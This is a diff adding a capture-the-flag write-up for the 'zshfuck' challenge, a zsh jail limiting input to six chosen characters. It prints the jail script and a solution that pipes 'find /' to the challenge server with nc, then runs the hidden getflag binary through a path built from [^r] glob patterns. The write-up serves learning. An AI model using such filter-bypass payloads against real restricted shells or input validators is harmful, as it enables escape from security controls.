|
| 1 | +# zshfuck |
| 2 | + |
| 3 | +## problem |
| 4 | + |
| 5 | + |
| 6 | + |
| 7 | +solved this with "HalfInchPunisher" also on the CyberSpace team |
| 8 | + |
| 9 | +## solution |
| 10 | + |
| 11 | +```zsh |
| 12 | +#!/bin/zsh |
| 13 | +print -n -P "%F{green}Specify your charset: %f" |
| 14 | +read -r charset |
| 15 | +# get uniq characters in charset |
| 16 | +charset=("${(us..)charset}") |
| 17 | +banned=('*' '?' '`') |
| 18 | + |
| 19 | +if [[ ${#charset} -gt 6 || ${#charset:|banned} -ne ${#charset} ]]; then |
| 20 | + print -P "\n%F{red}That's too easy. Sorry.%f\n" |
| 21 | + exit 1 |
| 22 | +fi |
| 23 | +print -P "\n%F{green}OK! Got $charset.%f" |
| 24 | +charset+=($'\n') |
| 25 | + |
| 26 | +# start jail via coproc |
| 27 | +coproc zsh -s |
| 28 | +exec 3>&p 4<&p |
| 29 | + |
| 30 | +# read chars from fd 4 (jail stdout), print to stdout |
| 31 | +while IFS= read -u4 -r -k1 char; do |
| 32 | + print -u1 -n -- "$char" |
| 33 | +done & |
| 34 | +# read chars from stdin, send to jail stdin if valid |
| 35 | +while IFS= read -u0 -r -k1 char; do |
| 36 | + if [[ ! ${#char:|charset} -eq 0 ]]; then |
| 37 | + print -P "\n%F{red}Nope.%f\n" |
| 38 | + exit 1 |
| 39 | + fi |
| 40 | + # send to fd 3 (jail stdin) |
| 41 | + print -u3 -n -- "$char" |
| 42 | +done |
| 43 | +``` |
| 44 | + |
| 45 | +we are only allowed to use 6 characters of our choosing (including space and tab) and then we can pass them to the stdin of another process as many times as we want. the goal is to run the getflag binary somewhere on the system |
| 46 | + |
| 47 | +the first thing we can do is to try finding the getflag binary by using `find /` as our charset and `find /` as the command also |
| 48 | + |
| 49 | +first.txt |
| 50 | +``` |
| 51 | +find / |
| 52 | +find / |
| 53 | +``` |
| 54 | + |
| 55 | +```console |
| 56 | +quasar@quasar098:~/wasteland/dice$ cat first.txt | nc mc.ax 31774 | grep getflag |
| 57 | +/app/y0u/w1ll/n3v3r_g3t/th1s/getflag |
| 58 | +``` |
| 59 | + |
| 60 | +for the other payload, we can use `[^r]` to match any character that is not `r`, i think, and then we can just run the binary by using those instead of regular letters in our path |
| 61 | + |
| 62 | +``` |
| 63 | +/[^r][^r][^r]/[^r][^r][^r]/[^r][^r][^r][^r]/[^r][^r][^r][^r]r[^r][^r][^r][^r]/[^r][^r][^r][^r]/[^r][^r][^r][^r][^r][^r][^r] |
| 64 | +``` |
| 65 | + |
| 66 | +this works because each character is not r except for that one character which is r, which we can just use as r |